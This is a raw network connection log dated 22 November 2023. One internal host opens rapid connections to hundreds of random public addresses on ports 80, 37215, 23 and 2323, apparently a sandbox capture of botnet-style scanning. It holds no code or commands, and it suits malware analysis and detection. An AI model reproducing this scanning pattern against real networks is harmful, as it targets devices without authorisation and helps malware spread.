Nov 22, 2023 08:37:49.420537949 CET	54328	80	192.168.2.23	95.222.139.7
Nov 22, 2023 08:37:49.420562029 CET	54328	80	192.168.2.23	95.17.151.101
Nov 22, 2023 08:37:49.420602083 CET	54328	80	192.168.2.23	95.251.133.150
Nov 22, 2023 08:37:49.420605898 CET	54328	80	192.168.2.23	95.224.165.236
Nov 22, 2023 08:37:49.420624971 CET	54328	80	192.168.2.23	95.246.84.221
Nov 22, 2023 08:37:49.420658112 CET	54328	80	192.168.2.23	95.215.236.123
Nov 22, 2023 08:37:49.420684099 CET	54328	80	192.168.2.23	95.114.241.125
Nov 22, 2023 08:37:49.420701027 CET	54328	80	192.168.2.23	95.27.104.49
Nov 22, 2023 08:37:49.420737028 CET	54328	80	192.168.2.23	95.245.170.157
Nov 22, 2023 08:37:49.420737982 CET	54328	80	192.168.2.23	95.160.171.53
Nov 22, 2023 08:37:49.420739889 CET	54328	80	192.168.2.23	95.211.65.118
Nov 22, 2023 08:37:49.420773029 CET	54328	80	192.168.2.23	95.160.109.173
Nov 22, 2023 08:37:49.420794964 CET	54328	80	192.168.2.23	95.114.204.207
Nov 22, 2023 08:37:49.420797110 CET	54328	80	192.168.2.23	95.30.30.167
Nov 22, 2023 08:37:49.420820951 CET	54328	80	192.168.2.23	95.5.151.249
Nov 22, 2023 08:37:49.420902014 CET	54328	80	192.168.2.23	95.209.94.74
Nov 22, 2023 08:37:49.420905113 CET	54328	80	192.168.2.23	95.223.229.102
Nov 22, 2023 08:37:49.420902014 CET	54328	80	192.168.2.23	95.40.25.202
Nov 22, 2023 08:37:49.420932055 CET	54328	80	192.168.2.23	95.171.36.101
Nov 22, 2023 08:37:49.420933962 CET	54328	80	192.168.2.23	95.87.42.187
Nov 22, 2023 08:37:49.420958996 CET	54328	80	192.168.2.23	95.99.162.92
Nov 22, 2023 08:37:49.421003103 CET	54328	80	192.168.2.23	95.158.99.95
Nov 22, 2023 08:37:49.421019077 CET	54328	80	192.168.2.23	95.75.25.158
Nov 22, 2023 08:37:49.421022892 CET	54328	80	192.168.2.23	95.123.200.251
Nov 22, 2023 08:37:49.421052933 CET	54328	80	192.168.2.23	95.29.93.130
Nov 22, 2023 08:37:49.421070099 CET	54328	80	192.168.2.23	95.169.6.174
Nov 22, 2023 08:37:49.421147108 CET	54328	80	192.168.2.23	95.136.248.161
Nov 22, 2023 08:37:49.421170950 CET	54328	80	192.168.2.23	95.65.250.182
Nov 22, 2023 08:37:49.421171904 CET	54328	80	192.168.2.23	95.184.120.121
Nov 22, 2023 08:37:49.421231985 CET	54328	80	192.168.2.23	95.213.97.113
Nov 22, 2023 08:37:49.421258926 CET	54328	80	192.168.2.23	95.143.90.86
Nov 22, 2023 08:37:49.421266079 CET	54328	80	192.168.2.23	95.216.223.219
Nov 22, 2023 08:37:49.421264887 CET	54328	80	192.168.2.23	95.253.85.110
Nov 22, 2023 08:37:49.421307087 CET	54328	80	192.168.2.23	95.212.73.62
Nov 22, 2023 08:37:49.421308994 CET	54328	80	192.168.2.23	95.194.238.191
Nov 22, 2023 08:37:49.421343088 CET	54328	80	192.168.2.23	95.129.131.239
Nov 22, 2023 08:37:49.421365023 CET	54328	80	192.168.2.23	95.168.164.236
Nov 22, 2023 08:37:49.421380997 CET	54328	80	192.168.2.23	95.240.199.181
Nov 22, 2023 08:37:49.421386003 CET	54328	80	192.168.2.23	95.151.214.28
Nov 22, 2023 08:37:49.421421051 CET	54328	80	192.168.2.23	95.209.49.27
Nov 22, 2023 08:37:49.421449900 CET	54328	80	192.168.2.23	95.253.210.250
Nov 22, 2023 08:37:49.421493053 CET	54328	80	192.168.2.23	95.0.111.201
Nov 22, 2023 08:37:49.421508074 CET	54328	80	192.168.2.23	95.78.134.208
Nov 22, 2023 08:37:49.421540976 CET	54328	80	192.168.2.23	95.12.36.242
Nov 22, 2023 08:37:49.421577930 CET	54328	80	192.168.2.23	95.40.30.109
Nov 22, 2023 08:37:49.421577930 CET	54328	80	192.168.2.23	95.157.183.56
Nov 22, 2023 08:37:49.421577930 CET	54328	80	192.168.2.23	95.126.5.90
Nov 22, 2023 08:37:49.421624899 CET	54328	80	192.168.2.23	95.43.66.59
Nov 22, 2023 08:37:49.421626091 CET	54328	80	192.168.2.23	95.34.20.93
Nov 22, 2023 08:37:49.421658993 CET	54328	80	192.168.2.23	95.156.131.175
Nov 22, 2023 08:37:49.421674967 CET	54328	80	192.168.2.23	95.242.62.12
Nov 22, 2023 08:37:49.421693087 CET	54328	80	192.168.2.23	95.68.247.44
Nov 22, 2023 08:37:49.421706915 CET	54328	80	192.168.2.23	95.168.144.50
Nov 22, 2023 08:37:49.421730995 CET	54328	80	192.168.2.23	95.185.36.121
Nov 22, 2023 08:37:49.421731949 CET	54328	80	192.168.2.23	95.121.253.127
Nov 22, 2023 08:37:49.421775103 CET	54328	80	192.168.2.23	95.104.181.74
Nov 22, 2023 08:37:49.421775103 CET	54328	80	192.168.2.23	95.176.211.206
Nov 22, 2023 08:37:49.421813965 CET	54328	80	192.168.2.23	95.135.166.8
Nov 22, 2023 08:37:49.421824932 CET	54328	80	192.168.2.23	95.12.164.129
Nov 22, 2023 08:37:49.421833992 CET	54328	80	192.168.2.23	95.187.61.104
Nov 22, 2023 08:37:49.421878099 CET	54328	80	192.168.2.23	95.255.205.139
Nov 22, 2023 08:37:49.421881914 CET	54328	80	192.168.2.23	95.204.46.51
Nov 22, 2023 08:37:49.421902895 CET	54328	80	192.168.2.23	95.10.128.150
Nov 22, 2023 08:37:49.421984911 CET	54328	80	192.168.2.23	95.44.246.115
Nov 22, 2023 08:37:49.422015905 CET	54328	80	192.168.2.23	95.55.84.197
Nov 22, 2023 08:37:49.422027111 CET	54328	80	192.168.2.23	95.136.227.196
Nov 22, 2023 08:37:49.422039032 CET	54328	80	192.168.2.23	95.154.100.232
Nov 22, 2023 08:37:49.422082901 CET	54328	80	192.168.2.23	95.113.192.154
Nov 22, 2023 08:37:49.422116041 CET	54328	80	192.168.2.23	95.21.8.27
Nov 22, 2023 08:37:49.422136068 CET	54328	80	192.168.2.23	95.125.224.221
Nov 22, 2023 08:37:49.422137022 CET	54328	80	192.168.2.23	95.134.224.243
Nov 22, 2023 08:37:49.422194004 CET	54328	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:49.422218084 CET	54328	80	192.168.2.23	95.175.234.43
Nov 22, 2023 08:37:49.422264099 CET	54328	80	192.168.2.23	95.233.48.229
Nov 22, 2023 08:37:49.422266006 CET	54328	80	192.168.2.23	95.128.139.89
Nov 22, 2023 08:37:49.422295094 CET	54328	80	192.168.2.23	95.68.67.247
Nov 22, 2023 08:37:49.422357082 CET	54328	80	192.168.2.23	95.106.30.234
Nov 22, 2023 08:37:49.422396898 CET	54328	80	192.168.2.23	95.205.2.50
Nov 22, 2023 08:37:49.422399044 CET	54328	80	192.168.2.23	95.141.180.208
Nov 22, 2023 08:37:49.422399044 CET	54328	80	192.168.2.23	95.23.198.7
Nov 22, 2023 08:37:49.422421932 CET	54328	80	192.168.2.23	95.46.202.45
Nov 22, 2023 08:37:49.422447920 CET	54328	80	192.168.2.23	95.29.136.83
Nov 22, 2023 08:37:49.422465086 CET	54328	80	192.168.2.23	95.201.49.159
Nov 22, 2023 08:37:49.422485113 CET	54328	80	192.168.2.23	95.154.104.197
Nov 22, 2023 08:37:49.422502041 CET	54328	80	192.168.2.23	95.166.184.108
Nov 22, 2023 08:37:49.422502995 CET	54328	80	192.168.2.23	95.65.39.195
Nov 22, 2023 08:37:49.422522068 CET	54328	80	192.168.2.23	95.8.223.17
Nov 22, 2023 08:37:49.422581911 CET	54328	80	192.168.2.23	95.178.45.207
Nov 22, 2023 08:37:49.422581911 CET	54328	80	192.168.2.23	95.25.169.18
Nov 22, 2023 08:37:49.422596931 CET	54328	80	192.168.2.23	95.237.5.45
Nov 22, 2023 08:37:49.422636986 CET	54328	80	192.168.2.23	95.6.189.164
Nov 22, 2023 08:37:49.422672987 CET	54328	80	192.168.2.23	95.126.10.246
Nov 22, 2023 08:37:49.422683001 CET	54328	80	192.168.2.23	95.71.206.125
Nov 22, 2023 08:37:49.422687054 CET	54328	80	192.168.2.23	95.95.44.10
Nov 22, 2023 08:37:49.422722101 CET	54328	80	192.168.2.23	95.176.14.44
Nov 22, 2023 08:37:49.422739029 CET	54328	80	192.168.2.23	95.93.4.92
Nov 22, 2023 08:37:49.422759056 CET	54328	80	192.168.2.23	95.220.236.206
Nov 22, 2023 08:37:49.422759056 CET	54328	80	192.168.2.23	95.166.130.75
Nov 22, 2023 08:37:49.422817945 CET	54328	80	192.168.2.23	95.18.140.116
Nov 22, 2023 08:37:49.422822952 CET	54328	80	192.168.2.23	95.14.251.63
Nov 22, 2023 08:37:49.422853947 CET	54328	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:49.422853947 CET	54328	80	192.168.2.23	95.129.172.8
Nov 22, 2023 08:37:49.422872066 CET	54328	80	192.168.2.23	95.196.236.68
Nov 22, 2023 08:37:49.422930002 CET	54328	80	192.168.2.23	95.235.236.4
Nov 22, 2023 08:37:49.422952890 CET	54328	80	192.168.2.23	95.2.159.229
Nov 22, 2023 08:37:49.422970057 CET	54328	80	192.168.2.23	95.194.251.176
Nov 22, 2023 08:37:49.422971964 CET	54328	80	192.168.2.23	95.244.133.191
Nov 22, 2023 08:37:49.423008919 CET	54328	80	192.168.2.23	95.245.72.205
Nov 22, 2023 08:37:49.423039913 CET	54328	80	192.168.2.23	95.86.150.76
Nov 22, 2023 08:37:49.423060894 CET	54328	80	192.168.2.23	95.213.127.180
Nov 22, 2023 08:37:49.423063040 CET	54328	80	192.168.2.23	95.115.208.193
Nov 22, 2023 08:37:49.423086882 CET	54328	80	192.168.2.23	95.113.103.136
Nov 22, 2023 08:37:49.423105001 CET	54328	80	192.168.2.23	95.18.70.114
Nov 22, 2023 08:37:49.423109055 CET	54328	80	192.168.2.23	95.194.14.108
Nov 22, 2023 08:37:49.423140049 CET	54328	80	192.168.2.23	95.59.223.237
Nov 22, 2023 08:37:49.423191071 CET	54328	80	192.168.2.23	95.3.51.60
Nov 22, 2023 08:37:49.423217058 CET	54328	80	192.168.2.23	95.183.186.177
Nov 22, 2023 08:37:49.423218966 CET	54328	80	192.168.2.23	95.4.149.73
Nov 22, 2023 08:37:49.423258066 CET	54328	80	192.168.2.23	95.64.83.112
Nov 22, 2023 08:37:49.423258066 CET	54328	80	192.168.2.23	95.177.27.62
Nov 22, 2023 08:37:49.423270941 CET	54328	80	192.168.2.23	95.113.29.204
Nov 22, 2023 08:37:49.423299074 CET	54328	80	192.168.2.23	95.163.29.182
Nov 22, 2023 08:37:49.423331022 CET	54328	80	192.168.2.23	95.3.58.134
Nov 22, 2023 08:37:49.423358917 CET	54328	80	192.168.2.23	95.219.104.195
Nov 22, 2023 08:37:49.423362017 CET	54328	80	192.168.2.23	95.31.40.107
Nov 22, 2023 08:37:49.423397064 CET	54328	80	192.168.2.23	95.126.3.4
Nov 22, 2023 08:37:49.423398972 CET	54328	80	192.168.2.23	95.66.53.243
Nov 22, 2023 08:37:49.423438072 CET	54328	80	192.168.2.23	95.203.240.49
Nov 22, 2023 08:37:49.423439026 CET	54328	80	192.168.2.23	95.152.233.236
Nov 22, 2023 08:37:49.423475027 CET	54328	80	192.168.2.23	95.95.189.76
Nov 22, 2023 08:37:49.423475027 CET	54328	80	192.168.2.23	95.120.50.28
Nov 22, 2023 08:37:49.423557043 CET	54328	80	192.168.2.23	95.8.196.67
Nov 22, 2023 08:37:49.423557997 CET	54328	80	192.168.2.23	95.86.208.155
Nov 22, 2023 08:37:49.423557997 CET	54328	80	192.168.2.23	95.92.250.62
Nov 22, 2023 08:37:49.424171925 CET	54335	37215	192.168.2.23	197.11.243.209
Nov 22, 2023 08:37:49.424173117 CET	54335	37215	192.168.2.23	197.115.245.220
Nov 22, 2023 08:37:49.424217939 CET	54335	37215	192.168.2.23	197.167.162.175
Nov 22, 2023 08:37:49.424217939 CET	54335	37215	192.168.2.23	197.11.100.192
Nov 22, 2023 08:37:49.424236059 CET	54335	37215	192.168.2.23	197.18.178.105
Nov 22, 2023 08:37:49.424268961 CET	54335	37215	192.168.2.23	197.3.69.49
Nov 22, 2023 08:37:49.424303055 CET	54335	37215	192.168.2.23	197.158.160.142
Nov 22, 2023 08:37:49.424321890 CET	54335	37215	192.168.2.23	197.242.212.184
Nov 22, 2023 08:37:49.424350977 CET	54335	37215	192.168.2.23	197.190.171.187
Nov 22, 2023 08:37:49.424355984 CET	54335	37215	192.168.2.23	197.31.217.182
Nov 22, 2023 08:37:49.424395084 CET	54335	37215	192.168.2.23	197.159.189.28
Nov 22, 2023 08:37:49.424424887 CET	54335	37215	192.168.2.23	197.160.74.112
Nov 22, 2023 08:37:49.424458027 CET	54335	37215	192.168.2.23	197.150.162.219
Nov 22, 2023 08:37:49.424458027 CET	54335	37215	192.168.2.23	197.43.232.169
Nov 22, 2023 08:37:49.424521923 CET	54335	37215	192.168.2.23	197.124.193.61
Nov 22, 2023 08:37:49.424523115 CET	54335	37215	192.168.2.23	197.150.147.229
Nov 22, 2023 08:37:49.424536943 CET	54335	37215	192.168.2.23	197.116.91.150
Nov 22, 2023 08:37:49.424566984 CET	54335	37215	192.168.2.23	197.110.202.6
Nov 22, 2023 08:37:49.424592972 CET	54335	37215	192.168.2.23	197.237.211.180
Nov 22, 2023 08:37:49.424645901 CET	54335	37215	192.168.2.23	197.74.19.91
Nov 22, 2023 08:37:49.424645901 CET	54335	37215	192.168.2.23	197.187.138.7
Nov 22, 2023 08:37:49.424690008 CET	54335	37215	192.168.2.23	197.63.202.198
Nov 22, 2023 08:37:49.424693108 CET	54335	37215	192.168.2.23	197.101.211.35
Nov 22, 2023 08:37:49.424724102 CET	54335	37215	192.168.2.23	197.149.5.104
Nov 22, 2023 08:37:49.424752951 CET	54335	37215	192.168.2.23	197.38.91.238
Nov 22, 2023 08:37:49.424767017 CET	54335	37215	192.168.2.23	197.193.72.219
Nov 22, 2023 08:37:49.424767971 CET	54335	37215	192.168.2.23	197.115.140.93
Nov 22, 2023 08:37:49.424803019 CET	54335	37215	192.168.2.23	197.54.2.27
Nov 22, 2023 08:37:49.424803019 CET	54335	37215	192.168.2.23	197.147.61.48
Nov 22, 2023 08:37:49.424817085 CET	54335	37215	192.168.2.23	197.83.164.118
Nov 22, 2023 08:37:49.424856901 CET	54335	37215	192.168.2.23	197.109.107.46
Nov 22, 2023 08:37:49.424877882 CET	54335	37215	192.168.2.23	197.158.192.198
Nov 22, 2023 08:37:49.424901009 CET	54335	37215	192.168.2.23	197.254.189.224
Nov 22, 2023 08:37:49.424922943 CET	54335	37215	192.168.2.23	197.63.106.225
Nov 22, 2023 08:37:49.424923897 CET	54335	37215	192.168.2.23	197.72.234.3
Nov 22, 2023 08:37:49.424968958 CET	54335	37215	192.168.2.23	197.224.25.65
Nov 22, 2023 08:37:49.424984932 CET	54335	37215	192.168.2.23	197.149.196.252
Nov 22, 2023 08:37:49.424998999 CET	54335	37215	192.168.2.23	197.33.205.193
Nov 22, 2023 08:37:49.425024033 CET	54335	37215	192.168.2.23	197.232.135.71
Nov 22, 2023 08:37:49.425039053 CET	54335	37215	192.168.2.23	197.109.97.95
Nov 22, 2023 08:37:49.425077915 CET	54335	37215	192.168.2.23	197.217.90.156
Nov 22, 2023 08:37:49.425084114 CET	54335	37215	192.168.2.23	197.13.113.138
Nov 22, 2023 08:37:49.425121069 CET	54335	37215	192.168.2.23	197.101.91.206
Nov 22, 2023 08:37:49.425132990 CET	54335	37215	192.168.2.23	197.236.129.40
Nov 22, 2023 08:37:49.425174952 CET	54335	37215	192.168.2.23	197.43.90.191
Nov 22, 2023 08:37:49.425175905 CET	54335	37215	192.168.2.23	197.80.183.85
Nov 22, 2023 08:37:49.425249100 CET	54335	37215	192.168.2.23	197.148.140.128
Nov 22, 2023 08:37:49.425249100 CET	54335	37215	192.168.2.23	197.66.147.168
Nov 22, 2023 08:37:49.425276995 CET	54335	37215	192.168.2.23	197.227.104.219
Nov 22, 2023 08:37:49.425277948 CET	54335	37215	192.168.2.23	197.43.87.148
Nov 22, 2023 08:37:49.425344944 CET	54335	37215	192.168.2.23	197.23.181.109
Nov 22, 2023 08:37:49.425345898 CET	54335	37215	192.168.2.23	197.139.239.28
Nov 22, 2023 08:37:49.425359964 CET	54335	37215	192.168.2.23	197.77.169.28
Nov 22, 2023 08:37:49.425359964 CET	54335	37215	192.168.2.23	197.84.111.105
Nov 22, 2023 08:37:49.425405979 CET	54335	37215	192.168.2.23	197.45.141.61
Nov 22, 2023 08:37:49.425429106 CET	54335	37215	192.168.2.23	197.247.238.192
Nov 22, 2023 08:37:49.425457954 CET	54335	37215	192.168.2.23	197.165.174.77
Nov 22, 2023 08:37:49.425487995 CET	54335	37215	192.168.2.23	197.158.9.137
Nov 22, 2023 08:37:49.425533056 CET	54335	37215	192.168.2.23	197.153.249.137
Nov 22, 2023 08:37:49.425538063 CET	54335	37215	192.168.2.23	197.170.26.81
Nov 22, 2023 08:37:49.425561905 CET	54335	37215	192.168.2.23	197.110.56.17
Nov 22, 2023 08:37:49.425587893 CET	54335	37215	192.168.2.23	197.110.175.255
Nov 22, 2023 08:37:49.425616980 CET	54335	37215	192.168.2.23	197.58.235.11
Nov 22, 2023 08:37:49.425645113 CET	54335	37215	192.168.2.23	197.90.168.249
Nov 22, 2023 08:37:49.425668001 CET	54335	37215	192.168.2.23	197.165.239.148
Nov 22, 2023 08:37:49.425679922 CET	54335	37215	192.168.2.23	197.54.27.209
Nov 22, 2023 08:37:49.425709963 CET	54335	37215	192.168.2.23	197.226.202.19
Nov 22, 2023 08:37:49.425714016 CET	54335	37215	192.168.2.23	197.209.22.170
Nov 22, 2023 08:37:49.425765038 CET	54335	37215	192.168.2.23	197.83.34.46
Nov 22, 2023 08:37:49.425812006 CET	54335	37215	192.168.2.23	197.148.182.17
Nov 22, 2023 08:37:49.425839901 CET	54335	37215	192.168.2.23	197.104.94.231
Nov 22, 2023 08:37:49.425842047 CET	54335	37215	192.168.2.23	197.157.18.20
Nov 22, 2023 08:37:49.425883055 CET	54335	37215	192.168.2.23	197.192.72.199
Nov 22, 2023 08:37:49.425919056 CET	54335	37215	192.168.2.23	197.57.41.195
Nov 22, 2023 08:37:49.425920963 CET	54335	37215	192.168.2.23	197.75.158.2
Nov 22, 2023 08:37:49.425940037 CET	54335	37215	192.168.2.23	197.203.0.90
Nov 22, 2023 08:37:49.425997972 CET	54335	37215	192.168.2.23	197.58.118.168
Nov 22, 2023 08:37:49.425997972 CET	54335	37215	192.168.2.23	197.12.111.78
Nov 22, 2023 08:37:49.426006079 CET	54335	37215	192.168.2.23	197.176.239.39
Nov 22, 2023 08:37:49.426007986 CET	54335	37215	192.168.2.23	197.154.95.85
Nov 22, 2023 08:37:49.426101923 CET	54335	37215	192.168.2.23	197.233.185.124
Nov 22, 2023 08:37:49.426101923 CET	54335	37215	192.168.2.23	197.232.154.174
Nov 22, 2023 08:37:49.426101923 CET	54335	37215	192.168.2.23	197.87.76.217
Nov 22, 2023 08:37:49.426121950 CET	54335	37215	192.168.2.23	197.125.42.131
Nov 22, 2023 08:37:49.426141024 CET	54335	37215	192.168.2.23	197.21.46.227
Nov 22, 2023 08:37:49.426171064 CET	54335	37215	192.168.2.23	197.78.236.229
Nov 22, 2023 08:37:49.426187038 CET	54335	37215	192.168.2.23	197.245.214.231
Nov 22, 2023 08:37:49.426238060 CET	54335	37215	192.168.2.23	197.101.127.88
Nov 22, 2023 08:37:49.426239014 CET	54335	37215	192.168.2.23	197.9.133.42
Nov 22, 2023 08:37:49.426258087 CET	54335	37215	192.168.2.23	197.52.246.170
Nov 22, 2023 08:37:49.426259041 CET	54335	37215	192.168.2.23	197.144.185.199
Nov 22, 2023 08:37:49.426281929 CET	54335	37215	192.168.2.23	197.109.244.149
Nov 22, 2023 08:37:49.426326036 CET	54335	37215	192.168.2.23	197.45.216.161
Nov 22, 2023 08:37:49.426359892 CET	54335	37215	192.168.2.23	197.20.230.9
Nov 22, 2023 08:37:49.426412106 CET	54335	37215	192.168.2.23	197.175.240.99
Nov 22, 2023 08:37:49.426429033 CET	54335	37215	192.168.2.23	197.75.15.37
Nov 22, 2023 08:37:49.426445961 CET	54335	37215	192.168.2.23	197.186.17.223
Nov 22, 2023 08:37:49.426450014 CET	54335	37215	192.168.2.23	197.200.33.15
Nov 22, 2023 08:37:49.426517010 CET	54335	37215	192.168.2.23	197.87.121.149
Nov 22, 2023 08:37:49.426517963 CET	54335	37215	192.168.2.23	197.185.92.187
Nov 22, 2023 08:37:49.426532030 CET	54335	37215	192.168.2.23	197.177.23.113
Nov 22, 2023 08:37:49.426536083 CET	54335	37215	192.168.2.23	197.250.41.108
Nov 22, 2023 08:37:49.426557064 CET	54335	37215	192.168.2.23	197.74.238.123
Nov 22, 2023 08:37:49.426594973 CET	54335	37215	192.168.2.23	197.232.26.228
Nov 22, 2023 08:37:49.426613092 CET	54335	37215	192.168.2.23	197.96.158.171
Nov 22, 2023 08:37:49.426650047 CET	54335	37215	192.168.2.23	197.75.238.230
Nov 22, 2023 08:37:49.426667929 CET	54335	37215	192.168.2.23	197.42.85.136
Nov 22, 2023 08:37:49.426747084 CET	54335	37215	192.168.2.23	197.105.222.67
Nov 22, 2023 08:37:49.426749945 CET	54335	37215	192.168.2.23	197.39.53.177
Nov 22, 2023 08:37:49.426749945 CET	54335	37215	192.168.2.23	197.174.143.70
Nov 22, 2023 08:37:49.426788092 CET	54335	37215	192.168.2.23	197.46.204.89
Nov 22, 2023 08:37:49.426820040 CET	54335	37215	192.168.2.23	197.144.141.33
Nov 22, 2023 08:37:49.426825047 CET	54335	37215	192.168.2.23	197.242.107.243
Nov 22, 2023 08:37:49.426882982 CET	54335	37215	192.168.2.23	197.184.37.159
Nov 22, 2023 08:37:49.426908016 CET	54335	37215	192.168.2.23	197.203.28.71
Nov 22, 2023 08:37:49.426908970 CET	54335	37215	192.168.2.23	197.224.6.101
Nov 22, 2023 08:37:49.426923990 CET	54335	37215	192.168.2.23	197.181.255.176
Nov 22, 2023 08:37:49.426973104 CET	54335	37215	192.168.2.23	197.37.177.213
Nov 22, 2023 08:37:49.427001953 CET	54335	37215	192.168.2.23	197.205.181.180
Nov 22, 2023 08:37:49.427002907 CET	54335	37215	192.168.2.23	197.75.217.125
Nov 22, 2023 08:37:49.427057028 CET	54335	37215	192.168.2.23	197.230.217.136
Nov 22, 2023 08:37:49.427077055 CET	54335	37215	192.168.2.23	197.219.177.140
Nov 22, 2023 08:37:49.427108049 CET	54335	37215	192.168.2.23	197.19.191.89
Nov 22, 2023 08:37:49.427109003 CET	54335	37215	192.168.2.23	197.49.91.64
Nov 22, 2023 08:37:49.427110910 CET	54335	37215	192.168.2.23	197.204.154.204
Nov 22, 2023 08:37:49.427136898 CET	54335	37215	192.168.2.23	197.147.183.5
Nov 22, 2023 08:37:49.427185059 CET	54335	37215	192.168.2.23	197.41.161.52
Nov 22, 2023 08:37:49.427259922 CET	54335	37215	192.168.2.23	197.135.201.225
Nov 22, 2023 08:37:49.427259922 CET	54335	37215	192.168.2.23	197.167.78.120
Nov 22, 2023 08:37:49.427259922 CET	54335	37215	192.168.2.23	197.145.152.172
Nov 22, 2023 08:37:49.427270889 CET	54335	37215	192.168.2.23	197.212.60.91
Nov 22, 2023 08:37:49.427316904 CET	54335	37215	192.168.2.23	197.162.209.161
Nov 22, 2023 08:37:49.427331924 CET	54335	37215	192.168.2.23	197.160.34.126
Nov 22, 2023 08:37:49.427333117 CET	54335	37215	192.168.2.23	197.154.95.28
Nov 22, 2023 08:37:49.427357912 CET	54335	37215	192.168.2.23	197.221.83.159
Nov 22, 2023 08:37:49.427383900 CET	54335	37215	192.168.2.23	197.122.159.176
Nov 22, 2023 08:37:49.427433968 CET	54335	37215	192.168.2.23	197.201.27.210
Nov 22, 2023 08:37:49.427457094 CET	54335	37215	192.168.2.23	197.36.192.156
Nov 22, 2023 08:37:49.427505016 CET	54335	37215	192.168.2.23	197.244.65.78
Nov 22, 2023 08:37:49.427526951 CET	54335	37215	192.168.2.23	197.116.67.220
Nov 22, 2023 08:37:49.427529097 CET	54335	37215	192.168.2.23	197.192.242.44
Nov 22, 2023 08:37:49.427555084 CET	54335	37215	192.168.2.23	197.226.154.103
Nov 22, 2023 08:37:49.427618027 CET	54335	37215	192.168.2.23	197.95.161.220
Nov 22, 2023 08:37:49.427618980 CET	54335	37215	192.168.2.23	197.174.151.186
Nov 22, 2023 08:37:49.427656889 CET	54335	37215	192.168.2.23	197.123.5.160
Nov 22, 2023 08:37:49.427706957 CET	54335	37215	192.168.2.23	197.169.158.27
Nov 22, 2023 08:37:49.427706957 CET	54335	37215	192.168.2.23	197.61.197.15
Nov 22, 2023 08:37:49.427750111 CET	54335	37215	192.168.2.23	197.60.87.23
Nov 22, 2023 08:37:49.427762032 CET	54335	37215	192.168.2.23	197.253.220.188
Nov 22, 2023 08:37:49.427764893 CET	54335	37215	192.168.2.23	197.176.111.124
Nov 22, 2023 08:37:49.427788019 CET	54335	37215	192.168.2.23	197.133.129.8
Nov 22, 2023 08:37:49.427819967 CET	54335	37215	192.168.2.23	197.192.72.133
Nov 22, 2023 08:37:49.427833080 CET	54335	37215	192.168.2.23	197.210.215.173
Nov 22, 2023 08:37:49.427872896 CET	54335	37215	192.168.2.23	197.210.85.179
Nov 22, 2023 08:37:49.427876949 CET	54335	37215	192.168.2.23	197.13.204.175
Nov 22, 2023 08:37:49.427891970 CET	54335	37215	192.168.2.23	197.193.217.8
Nov 22, 2023 08:37:49.427917957 CET	54335	37215	192.168.2.23	197.113.146.243
Nov 22, 2023 08:37:49.428031921 CET	54335	37215	192.168.2.23	197.70.92.172
Nov 22, 2023 08:37:49.428056955 CET	54335	37215	192.168.2.23	197.114.104.155
Nov 22, 2023 08:37:49.428132057 CET	54335	37215	192.168.2.23	197.105.99.66
Nov 22, 2023 08:37:49.435666084 CET	54320	2323	192.168.2.23	103.104.168.231
Nov 22, 2023 08:37:49.435678005 CET	54320	23	192.168.2.23	186.77.9.37
Nov 22, 2023 08:37:49.435688972 CET	54320	23	192.168.2.23	182.91.105.188
Nov 22, 2023 08:37:49.435688972 CET	54320	23	192.168.2.23	193.100.116.53
Nov 22, 2023 08:37:49.435688972 CET	54320	23	192.168.2.23	123.163.82.22
Nov 22, 2023 08:37:49.435688972 CET	54320	23	192.168.2.23	12.158.125.233
Nov 22, 2023 08:37:49.435688972 CET	54320	23	192.168.2.23	205.4.177.250
Nov 22, 2023 08:37:49.435692072 CET	54320	23	192.168.2.23	87.143.72.94
Nov 22, 2023 08:37:49.435692072 CET	54320	23	192.168.2.23	99.42.170.140
Nov 22, 2023 08:37:49.435694933 CET	54320	23	192.168.2.23	163.229.78.160
Nov 22, 2023 08:37:49.435709000 CET	54320	23	192.168.2.23	118.196.170.226
Nov 22, 2023 08:37:49.435709000 CET	54320	23	192.168.2.23	176.198.247.145
Nov 22, 2023 08:37:49.435719013 CET	54320	23	192.168.2.23	91.36.192.180
Nov 22, 2023 08:37:49.435719013 CET	54320	23	192.168.2.23	194.236.15.149
Nov 22, 2023 08:37:49.435720921 CET	54320	2323	192.168.2.23	161.39.230.191
Nov 22, 2023 08:37:49.435724020 CET	54320	23	192.168.2.23	17.49.129.206
Nov 22, 2023 08:37:49.435733080 CET	54320	23	192.168.2.23	93.167.221.118
Nov 22, 2023 08:37:49.435738087 CET	54320	23	192.168.2.23	179.251.99.196
Nov 22, 2023 08:37:49.435745955 CET	54320	23	192.168.2.23	191.142.9.240
Nov 22, 2023 08:37:49.435748100 CET	54320	2323	192.168.2.23	60.155.246.82
Nov 22, 2023 08:37:49.435750961 CET	54320	23	192.168.2.23	61.193.130.142
Nov 22, 2023 08:37:49.435750961 CET	54320	23	192.168.2.23	130.88.215.123
Nov 22, 2023 08:37:49.435764074 CET	54320	23	192.168.2.23	78.151.178.141
Nov 22, 2023 08:37:49.435765028 CET	54320	23	192.168.2.23	41.174.102.128
Nov 22, 2023 08:37:49.435765028 CET	54320	23	192.168.2.23	180.96.149.107
Nov 22, 2023 08:37:49.435775995 CET	54320	2323	192.168.2.23	70.85.207.14
Nov 22, 2023 08:37:49.435775995 CET	54320	23	192.168.2.23	77.20.63.50
Nov 22, 2023 08:37:49.435776949 CET	54320	23	192.168.2.23	209.98.13.80
Nov 22, 2023 08:37:49.435779095 CET	54320	23	192.168.2.23	109.232.121.253
Nov 22, 2023 08:37:49.435779095 CET	54320	23	192.168.2.23	59.64.132.94
Nov 22, 2023 08:37:49.435779095 CET	54320	23	192.168.2.23	220.221.97.18
Nov 22, 2023 08:37:49.435779095 CET	54320	23	192.168.2.23	183.252.168.179
Nov 22, 2023 08:37:49.435779095 CET	54320	23	192.168.2.23	160.3.212.15
Nov 22, 2023 08:37:49.435781956 CET	54320	23	192.168.2.23	114.116.120.215
Nov 22, 2023 08:37:49.435782909 CET	54320	23	192.168.2.23	31.43.237.33
Nov 22, 2023 08:37:49.435781956 CET	54320	23	192.168.2.23	61.82.215.186
Nov 22, 2023 08:37:49.435815096 CET	54320	23	192.168.2.23	112.234.213.115
Nov 22, 2023 08:37:49.435830116 CET	54320	23	192.168.2.23	118.216.17.8
Nov 22, 2023 08:37:49.435834885 CET	54320	23	192.168.2.23	178.48.209.99
Nov 22, 2023 08:37:49.435834885 CET	54320	23	192.168.2.23	165.220.101.59
Nov 22, 2023 08:37:49.435834885 CET	54320	23	192.168.2.23	144.136.240.63
Nov 22, 2023 08:37:49.435837984 CET	54320	23	192.168.2.23	181.235.68.235
Nov 22, 2023 08:37:49.435837984 CET	54320	23	192.168.2.23	176.19.239.247
